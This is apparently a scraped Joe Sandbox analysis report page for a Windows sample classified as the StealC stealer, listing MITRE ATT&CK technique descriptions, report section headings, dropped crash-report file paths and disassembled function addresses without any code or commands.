Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kNp6KbvVoz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kNp6KbvVoz.exe_f5bb9ea57f41118ff9028f6b65fba858f0329_fde4ec36_2783d4ed-b81a-4a78-a482-9f28c8a6aa9e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2140.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER224B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22AA.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
kNp6KbvVoz.exe

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82
networkmemoryfileCOMMON

Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
memoryCOMMON

Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191
networkfileCOMMON

Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67
memoryCOMMON

Function 048C003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON